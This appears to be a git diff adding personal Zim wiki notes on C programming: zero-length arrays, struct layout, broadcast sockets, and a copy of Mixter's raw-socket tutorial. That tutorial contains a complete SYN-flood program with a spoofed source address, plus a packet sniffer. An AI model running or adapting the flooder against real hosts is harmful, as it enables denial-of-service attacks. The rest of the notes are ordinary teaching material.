Add New Notes
83
Zim/Programme/#0������.txt#
Normal file
@@ -0,0 +1,83 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-21T16:33:24+08:00
|
||||
|
||||
====== 0长数组 ======
|
||||
Created Thursday 21 April 2011
|
||||
|
||||
0长度的数组:在标准c里面,是不允许0长度的数组的,gcc允许。的确带来了一些方便吧。最主要的应用是表示可变长度的内容时。
|
||||
|
||||
|
||||
例如:
|
||||
struct line
|
||||
{
|
||||
int length;
|
||||
char contents[0];
|
||||
};
|
||||
struct line * x = (struct line*)malloc(sizeof(struct line) + content_length);
|
||||
x->length = content_length;
|
||||
在标准c里面,contents长度至少为1才行,这样写malloc的时候长度计算就要复杂一点。
|
||||
|
||||
realtang 前辈例子中的可变长度似乎最好直接定义为指针再单独分配空间:
|
||||
代码:
|
||||
|
||||
struct line { int length; char* contents; } ...
|
||||
struct line * x = (struct line*)malloc(sizeof(struct line));
|
||||
x->length = content_length;
|
||||
x->contents = (char *)malloc(x->length);
|
||||
|
||||
下面是典型的用法
|
||||
代码:
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
int main() {
|
||||
struct line {
|
||||
int length;
|
||||
char content[0];
|
||||
};
|
||||
char *hello = "Hello";
|
||||
struct line * x = (struct line*)malloc(sizeof(struct line) + strlen(hello) + 1);
|
||||
x->length = strlen(hello) + 1;
|
||||
strcpy(x->content,hello);
|
||||
printf("%s\n",x->content);
|
||||
return 0;
|
||||
}
|
||||
|
||||
数组为0的例子,能想到比较而且需要的例子是通信的领域。 一个数据包括头部(header)和数据(payload), 头部一般有一字段指定数据长度。 但有时并没有数据要发送,为了让对端知道自己还是正常的,通信没有中断,可以发一个空包,在处理时可以用0大小的数组来表示空包。
|
||||
一般如果不支持0大小数组的系统,__在结构体定义的时候, 可以定义一个最小的数组__(如数组大小为1),不过如果要发的是空包时, 这个大小为1的数组已经浪费了一些内存,在大容量的嵌入式系统的,这些浪费内存的相当宝贵。 至于数组越界,那是程序员要注意的事情,根数组大小是不是0没有什么关系。
|
||||
|
||||
以下的结构理论上也可以,但处理上已经不方便了, header 和 payload已经分离了。发送数据得根据payload或length的值调用两次memcpy 把要发送的数据复制到发送缓冲区。
|
||||
代码:
|
||||
|
||||
struct {
|
||||
unsigned int length;
|
||||
char* payload;
|
||||
}
|
||||
|
||||
http://gcc.gnu.org/onlinedocs/gcc/Zero-Length.html
|
||||
6.17 Arrays of Length Zero
|
||||
|
||||
Zero-length arrays are allowed in GNU C. They are very useful as the last element of a structure which is really a header for a variable-length object:
|
||||
|
||||
struct line {
|
||||
int length;
|
||||
char contents[0];
|
||||
};
|
||||
|
||||
struct line *thisline = (struct line *)
|
||||
malloc (sizeof (struct line) + this_length);
|
||||
thisline->length = this_length;
|
||||
|
||||
In ISO C90, you would have to give contents a length of 1, which means either you waste space or complicate the argument to malloc.
|
||||
|
||||
In ISO C99, you would use a flexible array member, which is slightly different in syntax and semantics:
|
||||
|
||||
Flexible array members are written as contents[] without the 0.
|
||||
Flexible array members have incomplete type, and so the sizeof operator may not be applied. As a quirk of the original implementation of zero-length arrays, sizeof evaluates to zero.
|
||||
Flexible array members may only appear as the last member of a struct that is otherwise non-empty.
|
||||
A structure containing a flexible array member, or a union containing such a structure (possibly recursively), may not be a member of a structure or an element of an array. (However, these uses are permitted by GCC as extensions.)
|
||||
|
||||
|
||||
|
||||
7
Zim/Programme/APUE.txt
Normal file
@@ -0,0 +1,7 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-03-27T19:02:34+08:00
|
||||
|
||||
====== APUE ======
|
||||
Created Sunday 27 March 2011
|
||||
|
||||
@@ -0,0 +1,234 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T22:23:34+08:00
|
||||
|
||||
====== A brief programming tutorial in C for raw sockets ======
|
||||
Created 星期六 04 六月 2011
|
||||
A brief programming tutorial in C for raw sockets
|
||||
by Mixter for the BlackCode Magazine
|
||||
http://mixter.void.ru or http://mixter.warrior2k.com
|
||||
|
||||
1. Raw sockets
|
||||
2. The protocols IP, ICMP, TCP and UDP
|
||||
3. Building and injecting datagrams
|
||||
4. Basic transport layer operations
|
||||
|
||||
In this tutorial, you'll learn the basics of using raw sockets in C, to insert any IP protocol based datagram into the network traffic. This is useful,for example, to build raw socket scanners like nmap, to spoof or to perform operations that need to send out raw sockets. Basically, you can send any packet at any time, whereas using the interface functions for your systems IP-stack (connect, write, bind, etc.) you have no direct control over the packets. This theoretically enables you to simulate the behavior of your OS's IP stack, and also to send stateless traffic (datagrams that don't belong to a valid connection). For this tutorial, all you need is a minimal knowledge of socket programming in C (see http://www.ecst.csuchico.edu/~beej/guide/net/).
|
||||
I. Raw sockets
|
||||
|
||||
The basic concept of low level sockets is to send a single packet at one time, with all the protocol headers filled in by the program (instead of the kernel). Unix provides two kinds of sockets that permit direct access to the network. One is SOCK_PACKET, which receives and sends data on the device link layer. This means, the NIC specific header is included in the data that will be written or read. For most networks, this is the ethernet header. Of course, all subsequent protocol headers will also be included in the data. The socket type we'll be using, however, is SOCK_RAW, which includes the IP headers and all subsequent protocol headers and data.
|
||||
|
||||
The (simplified) link layer model looks like this:
|
||||
Physical layer -> Device layer (Ethernet protocol) -> Network layer (IP) ->
|
||||
Transport layer (TCP, UDP, ICMP) -> Session layer (application specific data)
|
||||
|
||||
Now to some practical stuff. A standard command to create a datagram socket is: socket (PF_INET, SOCK_RAW, IPPROTO_UDP); From the moment that it is created, you can send any IP packets over it, and receive any IP packets that the host received after that socket was created if you read() from it. Note that even though the socket is an interface to the IP header, it is transport layer specific. That means, for listening to TCP, UDP and ICMP traffic, you have to create 3 separate raw sockets, using IPPROTO_TCP, IPPROTO_UDP and IPPROTO_ICMP (the protocol numbers are 0 or 6 for tcp, 17 for udp and 1 for icmp).
|
||||
|
||||
With this knowledge, we can, for example, already create a small sniffer, that dumps out the contents of all tcp packets we receive. (Headers, etc. are missing, this is just an example. As you see, we are skipping the IP and TCP headers which are contained in the packet, and print out the payload, the data of the session/application layer, only).
|
||||
|
||||
int fd = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
char buffer[8192]; /* single packets are usually not bigger than 8192 bytes */
|
||||
while (read (fd, buffer, 8192) > 0)
|
||||
printf ("Caught tcp packet: %s\n",
|
||||
buffer+sizeof(struct iphdr)+sizeof(struct tcphdr));
|
||||
|
||||
II. The protocols IP, ICMP, TCP and UDP
|
||||
|
||||
To inject your own packets, all you need to know is the structures of the protocols that need to be included. Below you will find a short introduction to the IP, ICMP, TCP and UDP headers. It is recommended to build your packet by using a struct, so you can comfortably fill in the packet headers. Unix systems provide standard structures in the header files (eg. ). You can always create your own structs, as long as the length of each option is correct. To help you create portable programs, we'll use the BSD names in our structures. We'll also use the little endian notation. On big endian machines (some other processor architectures than intel x86), the 4 bit-size variables exchange places. However, one can always use the structures in the same ways in this program. Below each header structure is a short explanation of its members, so that you know what values should be filled in and which meaning they have.
|
||||
|
||||
The data types/sizes we need to use are: unsigned char - 1 byte (8 bits), unsigned short int - 2 bytes (16 bits) and unsigned int - 4 bytes (32 bits)
|
||||
|
||||
struct ipheader {
|
||||
unsigned char ip_hl:4, ip_v:4; /* this means that each member is 4 bits */
|
||||
unsigned char ip_tos;
|
||||
unsigned short int ip_len;
|
||||
unsigned short int ip_id;
|
||||
unsigned short int ip_off;
|
||||
unsigned char ip_ttl;
|
||||
unsigned char ip_p;
|
||||
unsigned short int ip_sum;
|
||||
unsigned int ip_src;
|
||||
unsigned int ip_dst;
|
||||
}; /* total ip header length: 20 bytes (=160 bits) */
|
||||
|
||||
The Internet Protocol is the network layer protocol, used for routing the data from the source to its destination. Every datagram contains an IP header followed by a transport layer protocol such as tcp.
|
||||
|
||||
ip_hl: the ip header length in 32bit octets. this means a value of 5 for the hl means 20 bytes (5 * 4). values other than 5 only need to be set it the ip header contains options (mostly used for routing)
|
||||
ip_v: the ip version is always 4 (maybe I'll write a IPv6 tutorial later;)
|
||||
ip_tos: type of service controls the priority of the packet. 0x00 is normal. the first 3 bits stand for routing priority, the next 4 bits for the type of service (delay, throughput, reliability and cost).
|
||||
ip_len: total length must contain the total length of the ip datagram. this includes ip header, icmp or tcp or udp header and payload size in bytes.
|
||||
ip_id: the id sequence number is mainly used for reassembly of fragmented IP datagrams. when sending single datagrams, each can have an arbitrary ID.
|
||||
ip_off: the fragment offset is used for reassembly of fragmented datagrams. the first 3 bits are the fragment flags, the first one always 0, the second the do-not-fragment bit (set by ip_off |= 0x4000) and the third the more-flag or more-fragments-following bit (ip_off |= 0x2000). the following 13 bits is the fragment offset, containing the number of 8-byte big packets already sent.
|
||||
ip_ttl: time to live is the amount of hops (routers to pass) before the packet is discarded, and an icmp error message is returned. the maximum is 255.
|
||||
ip_p: the transport layer protocol. can be tcp (6), udp(17), icmp(1), or whatever protocol follows the ip header. look in /etc/protocols for more.
|
||||
ip_sum: the datagram checksum for the whole ip datagram. every time anything in the datagram changes, it needs to be recalculated, or the packet will be discarded by the next router. see V. for a checksum function.
|
||||
ip_src and ip_dst: source and destination IP address, converted to long format, e.g. by inet_addr(). both can be chosen arbitrarily.
|
||||
|
||||
IP itself has no mechanism for establishing and maintaining a connection, or even containing data as a direct payload. Internet Control Messaging Protocol is merely an addition to IP to carry error, routing and control messages and data, and is often considered as a protocol of the network layer.
|
||||
|
||||
struct icmpheader {
|
||||
unsigned char icmp_type;
|
||||
unsigned char icmp_code;
|
||||
unsigned short int icmp_cksum;
|
||||
/* The following data structures are ICMP type specific */
|
||||
unsigned short int icmp_id;
|
||||
unsigned short int icmp_seq;
|
||||
}; /* total icmp header length: 8 bytes (=64 bits) */
|
||||
|
||||
icmp_type: the message type, for example 0 - echo reply, 8 - echo request, 3 - destination unreachable. look in for all the types.
|
||||
icmp_code: this is significant when sending an error message (unreach), and specifies the kind of error. again, consult the include file for more.
|
||||
icmp_cksum: the checksum for the icmp header + data. same as the IP checksum. Note: The next 32 bits in an icmp packet can be used in many different ways. This depends on the icmp type and code. the most commonly seen structure, an ID and sequence number, is used in echo requests and replies, hence we only use this one, but keep in mind that the header is actually more complex.
|
||||
icmp_id: used in echo request/reply messages, to identify the request
|
||||
icmp_seq: identifies the sequence of echo messages, if more than one is sent.
|
||||
|
||||
The User Datagram Protocol is a transport protocol for sessions that need to exchange data. Both transport protocols, UDP and TCP provide 65535 different source and destination ports. The destination port is used to connect to a specific service on that port. Unlike TCP, UDP is not reliable, since it doesn't use sequence numbers and stateful connections. This means UDP datagrams can be spoofed, and might not be reliable (e.g. they can be lost unnoticed), since they are not acknowledged using replies and sequence numbers.
|
||||
|
||||
struct udpheader {
|
||||
unsigned short int uh_sport;
|
||||
unsigned short int uh_dport;
|
||||
unsigned short int uh_len;
|
||||
unsigned short int uh_check;
|
||||
}; /* total udp header length: 8 bytes (=64 bits) */
|
||||
|
||||
uh_sport: The source port that a client bind()s to, and the contacted server will reply back to in order to direct his responses to the client.
|
||||
uh_dport: The destination port that a specific server can be contacted on.
|
||||
uh_len: The length of udp header and payload data in bytes.
|
||||
uh_check: The checksum of header and data, see IP checksum.
|
||||
|
||||
The Transmission Control Protocol is the mostly used transport protocol that provides mechanisms to establish a reliable connection with some basic authentication, using connection states and sequence numbers. (See IV. Basic transport layer operations.)
|
||||
|
||||
struct tcpheader {
|
||||
unsigned short int th_sport;
|
||||
unsigned short int th_dport;
|
||||
unsigned int th_seq;
|
||||
unsigned int th_ack;
|
||||
unsigned char th_x2:4, th_off:4;
|
||||
unsigned char th_flags;
|
||||
unsigned short int th_win;
|
||||
unsigned short int th_sum;
|
||||
unsigned short int th_urp;
|
||||
}; /* total tcp header length: 20 bytes (=160 bits) */
|
||||
|
||||
th_sport: The source port, which has the same function as in UDP.
|
||||
th_dport: The destination port, which has the same function as in UDP.
|
||||
th_seq: The sequence number is used to enumerate the TCP segments. The data in a TCP connection can be contained in any amount of segments (=single tcp datagrams), which will be put in order and acknowledged. For example, if you send 3 segments, each containing 32 bytes of data, the first sequence would be (N+)1, the second one (N+)33 and the third one (N+)65. "N+" because the initial sequence is random.
|
||||
th_ack: Every packet that is sent and a valid part of a connection is acknowledged with an empty TCP segment with the ACK flag set (see below), and the th_ack field containing the previous the_seq number.
|
||||
th_x2: This is unused and contains binary zeroes.
|
||||
th_off: The segment offset specifies the length of the TCP header in 32bit/4byte blocks. Without tcp header options, the value is 5.
|
||||
th_flags: This field consists of six binary flags. Using bsd headers, they can be combined like this: th_flags = FLAG1 | FLAG2 | FLAG3...
|
||||
TH_URG: Urgent. Segment will be routed faster, used for termination of a connection or to stop processes (using telnet protocol).
|
||||
TH_ACK: Acknowledgement. Used to acknowledge data and in the second and third stage of a TCP connection initiation (see IV.).
|
||||
TH_PSH: Push. The systems IP stack will not buffer the segment and forward it to the application immediately (mostly used with telnet).
|
||||
TH_RST: Reset. Tells the peer that the connection has been terminated.
|
||||
TH_SYN: Synchronization. A segment with the SYN flag set indicates that client wants to initiate a new connection to the destination port.
|
||||
TH_FIN: Final. The connection should be closed, the peer is supposed to answer with one last segment with the FIN flag set as well.
|
||||
th_win: Window. The amount of bytes that can be sent before the data should be acknowledged with an ACK before sending more segments.
|
||||
th_sum: The checksum of pseudo header, tcp header and payload. The pseudo is a structure containing IP source and destination address, 1 byte set to zero, the protocol (1 byte with a decimal value of 6), and 2 bytes (unsigned short) containing the total length of the tcp segment.
|
||||
th_urp: Urgent pointer. Only used if the urgent flag is set, else zero. It points to the end of the payload data that should be sent with priority.
|
||||
III. Building and injecting datagrams
|
||||
|
||||
Now, by putting together the knowledge about the protocol header structures with some basic C functions, it is easy to construct and send any datagram(s). We will demonstrate this with a small sample program that constantly sends out SYN requests to one host (Syn flooder).
|
||||
|
||||
#define __USE_BSD /* use bsd'ish ip header */
|
||||
#include /* these headers are for a Linux system, but */
|
||||
#include /* the names on other systems are easy to guess.. */
|
||||
#include
|
||||
#define __FAVOR_BSD /* use bsd'ish tcp header */
|
||||
#include
|
||||
#include
|
||||
|
||||
#define P 25 /* lets flood the sendmail port */
|
||||
|
||||
unsigned short /* this function generates header checksums */
|
||||
csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return ~sum;
|
||||
}
|
||||
|
||||
int
|
||||
main (void)
|
||||
{
|
||||
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */
|
||||
char datagram[4096]; /* this buffer will contain ip header, tcp header,
|
||||
and payload. we'll point an ip header structure
|
||||
at its beginning, and a tcp header structure after
|
||||
that to write the header values into it */
|
||||
struct ip *iph = (struct ip *) datagram;
|
||||
struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip);
|
||||
struct sockaddr_in sin;
|
||||
/* the sockaddr_in containing the dest. address is used
|
||||
in sendto() to determine the datagrams path */
|
||||
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons (P);/* you byte-order >1byte header values to network
|
||||
byte order (not needed on big endian machines) */
|
||||
sin.sin_addr.s_addr = inet_addr ("127.0.0.1");
|
||||
|
||||
memset (datagram, 0, 4096); /* zero out the buffer */
|
||||
|
||||
/* we'll now fill in the ip/tcp header values, see above for explanations */
|
||||
iph->ip_hl = 5;
|
||||
iph->ip_v = 4;
|
||||
iph->ip_tos = 0;
|
||||
iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr); /* no payload */
|
||||
iph->ip_id = htonl (54321); /* the value doesn't matter here */
|
||||
iph->ip_off = 0;
|
||||
iph->ip_ttl = 255;
|
||||
iph->ip_p = 6;
|
||||
iph->ip_sum = 0; /* set it to 0 before computing the actual checksum later */
|
||||
iph->ip_src.s_addr = inet_addr ("1.2.3.4");/* SYN's can be blindly spoofed */
|
||||
iph->ip_dst.s_addr = sin.sin_addr.s_addr;
|
||||
tcph->th_sport = htons (1234); /* arbitrary port */
|
||||
tcph->th_dport = htons (P);
|
||||
tcph->th_seq = random ();/* in a SYN packet, the sequence is a random */
|
||||
tcph->th_ack = 0;/* number, and the ack sequence is 0 in the 1st packet */
|
||||
tcph->th_x2 = 0;
|
||||
tcph->th_off = 0; /* first and only tcp segment */
|
||||
tcph->th_flags = TH_SYN; /* initial connection request */
|
||||
tcph->th_win = htonl (65535); /* maximum allowed window size */
|
||||
tcph->th_sum = 0;/* if you set a checksum to zero, your kernel's IP stack
|
||||
should fill in the correct checksum during transmission */
|
||||
tcph->th_urp = 0;
|
||||
|
||||
iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);
|
||||
|
||||
/* finally, it is very advisable to do a IP_HDRINCL call, to make sure
|
||||
that the kernel knows the header is included in the data, and doesn't
|
||||
insert its own header into the packet before our data */
|
||||
|
||||
{ /* lets do it the ugly way.. */
|
||||
int one = 1;
|
||||
const int *val = &one;
|
||||
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
|
||||
printf ("Warning: Cannot set HDRINCL!\n");
|
||||
}
|
||||
|
||||
while (1)
|
||||
{
|
||||
if (sendto (s, /* our socket */
|
||||
datagram, /* the buffer containing headers and data */
|
||||
iph->ip_len, /* total length of our datagram */
|
||||
0, /* routing flags, normally always 0 */
|
||||
(struct sockaddr *) &sin, /* socket addr, just like in */
|
||||
sizeof (sin)) < 0) /* a normal send() */
|
||||
printf ("error\n");
|
||||
else
|
||||
printf (".");
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
IV. Basic transport layer operations
|
||||
|
||||
To make use of raw packets, knowledge of the basic IP stack operations is essential. I'll try to give a brief introduction into the most important operations in the IP stack. To learn more about the behavior of the protocols, one option is to exame the source for your systems IP stack, which, in Linux, is located in the directory /usr/src/linux/net/ipv4/. The most important protocol, of course, is TCP, on which I will focus on.
|
||||
|
||||
Connection initiation: to contact an udp or tcp server listening on port 1234, the client calls a connect() with the sockaddr structure containing destination address and port. If the client did not bind() to a source port, the systems IP stack will select one it'll bind to. By connect()ing, the host sends a datagram containing the following information: IP src: client address, IP dest: servers address, TCP/UDP src: clients source port, TCP/UDP dest: port 1234. If a client is located on port 1234 on the destination host, it will reply back with a datagram containing: IP src: server IP dst: client srcport: server port dstport: clients source port. If there is no server located on the host, an ICMP type unreach message is created, subcode "Connection refused". The client will then terminate. If the destination host is down, either a router will create a different ICMP unreach message, or the client gets no reply and the connection times out.
|
||||
|
||||
TCP initiation ("3-way handshake") and connection: The client will do a connection initiation, with the tcp SYN flag set, an arbitrary sequence number, and no acknowledgement number. The server acknowledges the SYN by sending a packet with SYN and ACK set, another random sequence number and the acknowledgement number the original sequence. Finally, the client replies back with a tcp datagram with the ACK flag set, and the server's ack sequence incremented by one. Once the connection is established, each tcp segment will be sent with no flags (PSH and URG are optional), the sequence number for each packet incremented by the size of the previous tcp segment. After the amount of data specified as "window size" has been transferred, the peer sending data will wait for an acknowledgement, a tcp segment with the ACK flag set and the ack sequence number the one of the last data packet that could be received in order. That way, if any segments get lost, they will not be acknowledged and can be retransmitted. To end a connection, both server and client send a tcp packet with correct sequence numbers and the FIN flag set, and if the connection ever de-synchronizes (aborted, desynchronized, bad sequence numbers, etc.) the peer that notices the error will send a RST packet with correct seq numbers to terminate the connection.
|
||||
- Mixter
|
||||
@@ -0,0 +1,80 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-06T21:44:54+08:00
|
||||
|
||||
====== Broadcasting and determining network configuration ======
|
||||
Created 星期一 06 六月 2011
|
||||
|
||||
http://uw714doc.sco.com/en/SDK_netapi/sockC.bcast_det_netconf.html
|
||||
By using a datagram socket, it is possible to send broadcast packets on many networks connected to the system. The **network itself **must support broadcast; the system provides no simulation of broadcast in software. Broadcast messages can place a high load on a network since they force every host on the network to service them. Consequently, the ability to send broadcast packets has been limited to sockets that are __explicitly marked as allowing broadcasting__. Broadcast is typically used for one of two reasons: it is desired to__ find a resource __on a local network without prior knowledge of its address, or __important functions__ such as routing require that information be sent to all accessible neighbors.
|
||||
|
||||
To send a broadcast message, a** datagram** socket should be created:
|
||||
|
||||
s = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
The socket is marked as allowing broadcasting,
|
||||
|
||||
int on = 1;
|
||||
setsockopt(s, SOL_SOCKET, __SO_BROADCAST,__ &on, sizeof(on));
|
||||
|
||||
and at least a port number should be bound to the socket:
|
||||
|
||||
sin.sin_len = sizeof(sin); //注意这个是FreeBSD对struct sockaddr的定义
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = htonl(INADDR_ANY);
|
||||
sin.sin_port = htons(MYPORT);
|
||||
bind(s, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
The destination address of the message to be broadcast__ depends on the network(s) __on which the message is to be broadcast. (因为不同网络,其广播地址是不一样的。一般不使用255.255.255.255这种广播地址,而应该使用面向子网的广播地址如:192.168.1.255)The Internet domain supports a shorthand notation for broadcast on the local network, the address INADDR_BROADCAST (defined in netinet/in.h). To determine the list of addresses for all reachable neighbors requires knowledge of the networks to which the host is connected. Since this information should be obtained in a host-independent fashion and may be impossible to derive, the UNIX system provides a method of retrieving this information from the system data structures. The SIOCGIFCONF ioctl call returns the interface configuration of a host as a single ifconf structure; this structure contains a ``data area'' that is made up of an array of ifreq structures, one for each address domain supported by each network interface to which the host is connected. These structures are defined in net/if.h as follows:
|
||||
|
||||
struct ifreq {
|
||||
#define IFNAMSIZ 16
|
||||
char ifr_name[IFNAMSIZ]; /* if name, for example, "en0" */
|
||||
union {
|
||||
struct sockaddr ifru_addr;
|
||||
struct sockaddr ifru_dstaddr;
|
||||
char ifru_oname[IFNAMSIZ]; /* other if name */
|
||||
struct sockaddr ifru_broadaddr;
|
||||
short ifru_flags;
|
||||
int ifru_metric;
|
||||
char ifru_data[1]; /* interface dependent data */
|
||||
char ifru_enaddr[6];
|
||||
} ifr_ifru;
|
||||
|
||||
|
||||
#define ifr_addr ifr_ifru.ifru_addr /* address */ #define ifr_dstaddr ifr_ifru.ifru_dstaddr /* other end of p-to-p link */ #define ifr_oname ifr_ifru.ifru_oname /* other if name */ #define ifr_broadaddr ifr_ifru.ifru_broadaddr /* broadcast address */ #define ifr_flags ifr_ifru.ifru_flags /* flags */ #define ifr_metric ifr_ifru.ifru_metric /* metric */ #define ifr_data ifr_ifru.ifru_data /* for use by interface */ #define ifr_enaddr ifr_ifru.ifru_enaddr /* ethernet address */ };
|
||||
|
||||
The call that obtains the interface configuration is:
|
||||
|
||||
struct ifconf ifc;
|
||||
char buf[BUFSIZ];
|
||||
|
||||
|
||||
ifc.ifc_len = sizeof(buf); ifc.ifc_buf = buf; if (ioctl(s, SIOCGIFCONF, (char *) &ifc) < 0) { ... }
|
||||
|
||||
After this call buf will contain a list of ifreq structures, one for each network to which the host is connected. These structures will be ordered first by interface name and then by supported address families. ifc.ifc_len will have been modified to reflect the number of bytes used by the ifreq structures.
|
||||
|
||||
For each structure there exists a set of ``interface flags'' that tell whether the network corresponding to that interface is up or down, point to point or broadcast, and so on. The SIOCGIFFLAGS ioctl retrieves these flags for an interface specified by an ifreq structure as follows:
|
||||
|
||||
struct ifreq *ifr;
|
||||
|
||||
|
||||
ifr = ifc.ifc_req;
|
||||
|
||||
for (n=ifc.ifc_len/sizeof(struct ifreq); --n >= 0; ifr++) { /* * We must be careful that we don't use an interface * devoted to an address domain other than those intended */ if (ifr->ifr_addr.sa_family != AF_INET) continue; if (ioctl(s, SIOCGIFFLAGS, (char *) ifr) < 0) { ... } /* * Skip boring cases */ if ((ifr->ifr_flags & IFF_UP) == 0 || (ifr->ifr_flags & IFF_LOOPBACK) || (ifr->ifr_flags & (IFF_BROADCAST | IFF_POINTOPOINT)) == 0) continue; }
|
||||
|
||||
Once the flags have been obtained, the broadcast address must be obtained. With broadcast networks this is done via the SIOCGIFBRDADDR ioctl, while for point-to-point networks the address of the destination host is obtained with SIOCGIFDSTADDR.
|
||||
|
||||
struct sockaddr dst;
|
||||
|
||||
|
||||
if (ifr->ifr_flags & IFF_POINTOPOINT) { if (ioctl(s, SIOCGIFDSTADDR, (char *) ifr) < 0) { ... } memcpy((char *) &dst, (char *) &ifr->ifr_dstaddr, sizeof(ifr->ifr_dstaddr)); } else if (ifr->ifr_flags & IFF_BROADCAST) { if (ioctl(s, SIOCGIFBRDADDR, (char *) ifr) < 0) { ... } memcpy((char *) &dst, (char *) &ifr->ifr_broadaddr, sizeof(ifr->ifr_broadaddr)); }
|
||||
|
||||
After the appropriate ioctl(2) has obtained the broadcast or destination address (now in dst), the sendto call may be used:
|
||||
|
||||
sendto(s, buf, buflen, 0, (struct sockaddr *)&dst,
|
||||
sizeof(dst));
|
||||
|
||||
In the above loop one sendto occurs for every interface to which the host is connected that supports the notion of broadcast or point-to-point addressing. If a process only wished to send broadcast messages on a given network, code similar to that outlined above would be used, but the loop would need to find the correct destination address.
|
||||
|
||||
Received broadcast messages contain the sender's address and port, as datagram sockets are bound before a message is allowed to go out.
|
||||
328
Zim/Programme/APUE/C&C+语言struct深层探索.txt
Normal file
@@ -0,0 +1,328 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T14:40:33+08:00
|
||||
|
||||
====== C&C+语言struct深层探索 ======
|
||||
Created 星期六 04 六月 2011
|
||||
C/C+语言struct深层探索
|
||||
|
||||
===== 1. struct的巨大作用 =====
|
||||
|
||||
面对一个人的大型C/C++程序时,只看其对struct的使用情况我们就可以对其编写者的编程经验进行评估。因为一个大型的C/C++程序,势必要涉及一些(甚至大量)进行数据组合的结构体,这些结构体可以将原本意义属于一个整体的数据组合在一起。从某种程度上来说,会不会用struct,怎样用struct是区别一个开发人员是否具备丰富开发经历的标志。
|
||||
|
||||
在网络协议、通信控制、嵌入式系统的C/C++编程中,我们经常要传送的不是简单的字节流(char型数组),而是多种数据组合起来的一个整体,其表现形式是一个结构体。
|
||||
|
||||
经验不足的开发人员往往将所有需要传送的内容依顺序保存在**char型数组**中,通过**指针偏移**的方法传送网络报文等信息。这样做编程复杂,易出错,而且一旦控制方式及通信协议有所变化,程序就要进行非常细致的修改。
|
||||
|
||||
一个有经验的开发者则灵活运用结构体,举一个例子,假设网络或控制协议中需要传送三种报文,其格式分别为packetA、packetB、packetC:
|
||||
|
||||
struct structA
|
||||
{
|
||||
int a;
|
||||
char b;
|
||||
};
|
||||
|
||||
|
||||
struct structB
|
||||
{
|
||||
char a;
|
||||
short b;
|
||||
};
|
||||
|
||||
|
||||
struct structC
|
||||
{
|
||||
int a;
|
||||
char b;
|
||||
float c;
|
||||
}
|
||||
|
||||
优秀的程序设计者这样设计传送的报文:
|
||||
|
||||
struct CommuPacket
|
||||
{
|
||||
int iPacketType; //报文类型标志
|
||||
union //每次传送的是三种报文中的一种,使用union
|
||||
{
|
||||
struct structA packetA;
|
||||
struct structB packetB;
|
||||
struct structC packetC;
|
||||
}
|
||||
};
|
||||
|
||||
在进行报文传送时,直接传送struct CommuPacket一个整体。
|
||||
|
||||
假设发送函数的原形如下:
|
||||
|
||||
// pSendData:发送字节流的首地址,iLen:要发送的长度
|
||||
|
||||
Send(char * pSendData, unsigned int iLen);
|
||||
|
||||
发送方可以直接进行如下调用发送struct CommuPacket的一个实例sendCommuPacket:
|
||||
|
||||
Send( (char *)&sendCommuPacket , sizeof(CommuPacket) );
|
||||
|
||||
假设接收函数的原形如下:
|
||||
|
||||
// pRecvData:发送字节流的首地址,iLen:要接收的长度
|
||||
|
||||
//返回值:实际接收到的字节数
|
||||
|
||||
unsigned int Recv(char * pRecvData, unsigned int iLen);
|
||||
|
||||
接收方可以直接进行如下调用将接收到的数据保存在struct CommuPacket的一个实例recvCommuPacket中:
|
||||
|
||||
Recv( (char *)&recvCommuPacket , sizeof(CommuPacket) );
|
||||
|
||||
接着判断报文类型进行相应处理:
|
||||
|
||||
switch(recvCommuPacket. iPacketType)
|
||||
|
||||
{
|
||||
|
||||
case PACKET_A:
|
||||
|
||||
… //A类报文处理
|
||||
|
||||
break;
|
||||
|
||||
case PACKET_B:
|
||||
|
||||
… //B类报文处理
|
||||
|
||||
break;
|
||||
|
||||
case PACKET_C:
|
||||
|
||||
… //C类报文处理
|
||||
|
||||
break;
|
||||
|
||||
}
|
||||
|
||||
以上程序中最值得注意的是
|
||||
|
||||
Send( (char *)&sendCommuPacket , sizeof(CommuPacket) );
|
||||
|
||||
Recv( (char *)&recvCommuPacket , sizeof(CommuPacket) );
|
||||
|
||||
中的__强制类型转换__:(char *)&sendCommuPacket、(char *)&recvCommuPacket,先取地址,再转化为char型指针,这样就可以直接利用处理字节流的函数。
|
||||
|
||||
利用这种强制类型转化,我们还可以方便程序的编写,例如要对sendCommuPacket所处内存初始化为0,可以这样调用标准库函数memset():
|
||||
|
||||
memset((char *)&sendCommuPacket,0, sizeof(CommuPacket));
|
||||
|
||||
===== 2. struct的成员对齐 =====
|
||||
|
||||
Intel、微软等公司曾经出过一道类似的面试题:
|
||||
|
||||
1. #include <iostream.h>
|
||||
2. #pragma pack(8)
|
||||
3. struct example1
|
||||
4. {
|
||||
5. short a;
|
||||
6. long b;
|
||||
7. };
|
||||
|
||||
|
||||
8. struct example2
|
||||
9. {
|
||||
10. char c;
|
||||
11. example1 struct1;
|
||||
12. short e;
|
||||
13. };
|
||||
14. #pragma pack()
